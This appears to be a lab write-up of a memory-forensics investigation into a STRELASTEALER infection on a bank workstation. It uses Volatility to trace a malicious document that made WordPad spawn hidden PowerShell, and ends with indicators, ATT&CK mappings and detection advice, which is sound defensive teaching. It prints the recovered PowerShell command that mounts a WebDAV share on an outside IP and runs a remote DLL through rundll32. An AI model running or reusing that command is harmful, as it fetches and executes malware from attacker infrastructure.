A financial institution workstation with access to sensitive data triggered unusual SIEM alerts. A memory dump from the suspected machine has been provided. The task is to analyse the image for signs of compromise, trace the origin of the anomaly, and assess the scope of the breach.
The first plugin to run against any Windows memory image is windows.pstree — it immediately surfaces anomalous parent-child relationships that are invisible in a flat process list:
vol -f 192-Reveal.dmp windows.pstree

One relationship stands out immediately: powershell.exe (PID 3692) spawned by wordpad.exe (PID 4120). WordPad has no legitimate reason to spawn PowerShell. This pattern is consistent with a malicious document — likely a crafted RTF — opened in WordPad that triggered code execution, a known initial access technique targeting document viewers that lack macro security controls.
The full command line recovered from the PowerShell process reveals the complete second-stage delivery mechanism:
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ;
rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
Two operations execute in sequence. First, net use mounts a WebDAV share hosted at 45[.]9[.]74[.]32 on port 8888 — the @8888 syntax is the Windows UNC path notation for WebDAV over non-standard ports, deliberately chosen to avoid port 80/443 inspection. The share name davwwwroot is a standard WebDAV root directory name used in this staging technique. Second, rundll32 loads 3435.dll directly from that mounted UNC path and calls the entry export — the second-stage payload executes entirely from the remote share without writing the DLL to disk first.
The -windowstyle hidden flag suppresses any console window, making the execution invisible to the user. This is T1218.011 — Signed Binary Proxy Execution via rundll32, using a legitimate Windows binary to load and execute attacker-controlled code.
Running windows.getsids and filtering on the malicious PID confirms the account context under which the attack executed:
vol -f 192-Reveal.dmp windows.getsids | grep "4120"

The process ran under the account Elon — a standard user account. The attacker had no elevated privileges at the time of execution, though STRELASTEALER’s primary objective is credential theft rather than privilege escalation.
Submitting the C2 IP 45[.]9[.]74[.]32 to VirusTotal correlates it with known malicious infrastructure:

The IP is attributed to STRELASTEALER — an information stealer first documented in 2022 that specifically targets email client credentials from Outlook and Thunderbird. The malware hunts for credential stores and account configuration files, exfiltrating them to the C2. Given the victim is a financial institution workstation, any email-stored credentials or session tokens are high-value targets.
| Phase | Action |
|---|---|
| Initial Access | Malicious document opened in wordpad.exe (PID 4120) triggers code execution |
| Execution | wordpad.exe spawns powershell.exe (PID 3692) with -windowstyle hidden |
| C2 Staging | net use mounts WebDAV share at 45[.]9[.]74[.]32:8888\davwwwroot |
| Second Stage | rundll32 loads 3435.dll from remote UNC path, calls entry export |
| Collection | STRELASTEALER harvests email client credentials from user Elon |
| Type | Value |
|---|---|
| C2 IP | 45[.]9[.]74[.]32 |
| C2 Port | 8888 |
| WebDAV Share | \45[.]9[.]74[.]32@8888\davwwwroot |
| Second Stage DLL | 3435.dll |
| Malicious Process | powershell.exe (PID 3692) |
| Parent Process | wordpad.exe (PID 4120) |
| Compromised User | Elon |
| Malware Family | STRELASTEALER |
| Technique | ID | Description |
|---|---|---|
| Phishing: Spearphishing Attachment | T1566.001 | Malicious document delivered and opened in WordPad triggers initial execution |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Hidden PowerShell spawned by WordPad to mount WebDAV share and execute payload |
| System Binary Proxy Execution: Rundll32 | T1218.011 | rundll32 loads 3435.dll from remote UNC path via WebDAV, calling entry export |
| Application Layer Protocol: Web Protocols | T1071.001 | WebDAV over port 8888 used to stage and deliver second-stage DLL from C2 |
WordPad spawning PowerShell is an unambiguous detection signal — there is no legitimate workflow in which wordpad.exe is a parent of powershell.exe. EDR process creation rules flagging this parent-child pair will catch this class of document-based execution regardless of the specific payload. The same logic applies broadly: Office applications, PDF readers, and document viewers spawning scripting interpreters should alert immediately.
WebDAV over non-standard ports bypasses naive egress filtering — the @8888 UNC path syntax routes WebDAV traffic over port 8888 rather than 80 or 443, evading rules that only inspect standard web ports. Effective egress filtering must inspect all outbound traffic, not just common ports, and should alert on net use commands targeting external IPs.
Fileless second-stage execution leaves minimal on-disk artefacts — 3435.dll was loaded directly from the remote UNC path without being written to the local filesystem. Standard AV scanning of local drives would find nothing. Detection requires either network-layer inspection of the WebDAV session or memory-resident detection of the loaded DLL — precisely the kind of visibility a memory dump analysis provides.
STRELASTEALER targets email credentials specifically — any workstation running Outlook or Thunderbird where this infection chain completed should be treated as having all stored email credentials compromised. Immediate rotation of email account passwords, revocation of any stored OAuth tokens, and audit of sent mail for exfiltration are the priority IR steps alongside containment.